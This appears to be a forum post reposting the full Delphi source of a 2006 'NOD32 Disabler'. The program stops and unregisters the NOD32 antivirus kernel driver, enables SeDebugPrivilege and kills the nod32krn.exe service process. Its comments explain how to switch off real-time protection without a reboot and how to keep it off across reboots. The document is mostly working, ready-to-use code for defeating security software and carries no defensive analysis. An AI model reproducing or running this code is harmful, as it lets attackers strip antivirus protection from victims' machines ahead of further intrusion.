Nod32 Disabler

[WestSide]

Код:

Program AntiNod32; 
{ 
   NOD32 Disabler by FuXdas aka CyberPunk 
   13/09/2006 
   --------------------------------------- 

} 

{$APPTYPE CONSOLE} 

Uses Windows, TLHelp32, WinSvc; 

Const 
  Welcome = ' Coded by FuXdas ~ [email protected]'+#13#10+ 
            ' www.instinctcoders.com'+#13#10+#13#10+ 
            ' WARNING!!, This Application demonstrate how disable NOD32 Protection.'+#13#10+ 
            ' Source code is included, Tested on NOD32 NT version, '+#13#10+ 
            ' Type yes if u want to disable NOD32 protection'+#13#10; 

  PROCESS_TERMINATE = $0001; 
  DrvName: PChar = 'AMON';  // Nod32 core Kernel Driver 
  SrvName: PChar = 'nod32krn.exe'; 

//--- We will stop the nod driver with this function 
// Nod that it work like Services 
Function StopNodDriver(): Boolean; 
Var 
  SCManager, Service: SC_Handle; 
  ServiceStatus: TServiceStatus; 
Begin 
  Result := False; 
  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT); 
  If SCManager = 0 Then Exit; 
  Try 
    Service := OpenService(SCManager, PChar(DrvName), SERVICE_STOP); 
    If ControlService(Service, SERVICE_CONTROL_STOP, ServiceStatus) Then 
      Result := True; 
    CloseServiceHandle(Service); 
  Finally 
    CloseServiceHandle(SCManager); 
  End; 
End; 
//Unregistring nod's driver 
// This will remove driver's keys from registry 
Function UnrNodDrv(): Boolean; 
Var 
  SCManager, Service: SC_Handle; 
Begin 
  Result := False; 
  SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT); 
  If SCManager = 0 Then Exit; 
  Try 
    Service := OpenService(SCManager, PChar(DrvName), STANDARD_RIGHTS_REQUIRED); 
    If Service <> 0 Then 
      If DeleteService(Service) Then 
        Result := True; 
    CloseServiceHandle(Service); 
  Finally 
    CloseServiceHandle(SCManager); 
  End; 
End; 

//- we will need some privilege 
procedure SetTokenPrivileges; 
var 
  hToken1, hToken2, hToken3: THandle; 
  TokenPrivileges: TTokenPrivileges; 
  Version: OSVERSIONINFO; 
begin 
  Version.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO); 
  GetVersionEx(Version); 
  if Version.dwPlatformId <> VER_PLATFORM_WIN32_WINDOWS then 
  begin 
    try 
      OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken1); 
      hToken2 := hToken1; 
      LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPrivileges.Privileges[0].luid); 
      TokenPrivileges.PrivilegeCount := 1; 
      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; 
      hToken3 := 0; 
      AdjustTokenPrivileges(hToken1, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3); 
      TokenPrivileges.PrivilegeCount := 1; 
      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; 
      hToken3 := 0; 
      AdjustTokenPrivileges(hToken2, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3); 
      CloseHandle(hToken1); 
    except; 
    end; 
  end; 
end; 

Function ExtractFileName(s: String): String; 
Var i, j: integer; 
Begin 
  j := 0; 
  For i := 1 To length(s) Do 
    If (s[i] = '\') Then j := i; 
  result := copy(s, j + 1, length(s)); 
End; 

//--- Yeah killing Nod's services 
//After stoping Nod's driver we need to kill the service 
// And like this nod32krn.exe will need to load the driver, but can't because the driver is stoped 
//-- By the way after some research I have found that Nod injects 2 or 3 threads in 'services.exe' 
// and like this if killed, it will be restarted by the remote thread. 
// so if u want to completly kill nod's service u must kill the 2 threads in 'services.exe' 
Function KillNod32(): integer; 
Var 
  ContinueLoop: BOOL; 
  FSnapshotHandle: THandle; 
  FProcessEntry32: TProcessEntry32; 
Begin 
  result := 0; 
  SetTokenPrivileges; 
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32); 
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); 
  While integer(ContinueLoop) <> 0 Do 
  Begin 
    If (ExtractFileName(FProcessEntry32.szExeFile)) = SrvName Then 
      Result := Integer(TerminateProcess(OpenProcess( 
        PROCESS_TERMINATE, BOOL(0), 
        FProcessEntry32.th32ProcessID), 0)); 
    ContinueLoop := Process32Next(FSnapshotHandle, 
      FProcessEntry32); 
  End; 
  CloseHandle(FSnapshotHandle); 
End; 

var 
  s:string; 
Begin 
//- yep just to demonstrate, )) u can remove all that shits 
/// 
  WriteLn(welcome); 
  ReadLn(s); 
  If s = 'yes' then 
  Begin 
  //-- This one is the most important we must stop the driver 
  If StopNodDriver() Then 
    WriteLn(' Stoping Nod32 driver ok ') 
  Else 
  Begin 
    WriteLn(' Failed to stop Nod32 driver,any key to continue....'); 
    Readln; 
  End; 
    //-- u can remove this function if u want that nod that start in the next boot 
    /// 
  If UnrNodDrv() Then 
    WriteLn(' Unregistring Nod32 driver ok') 
  Else 
  Begin 
    WriteLn(' Error while trying to Unregister Nod32 Driver,any key to continue...'); 
    ReadLn; 
  End; 
  Asm 
     Call KillNod32 //;)) 
     // After this the NOD's realtime protection will be disabled completly 
     // and we don't need a reboot 
     //- and if u use StopNodDriver() nod will be disabled also after the reb0ot 
     // So be carefull 

  End; 
end; 
readln 
// Cya FuXdas 
// contact: [email protected] 
//          www.instinctcoders.com 
End.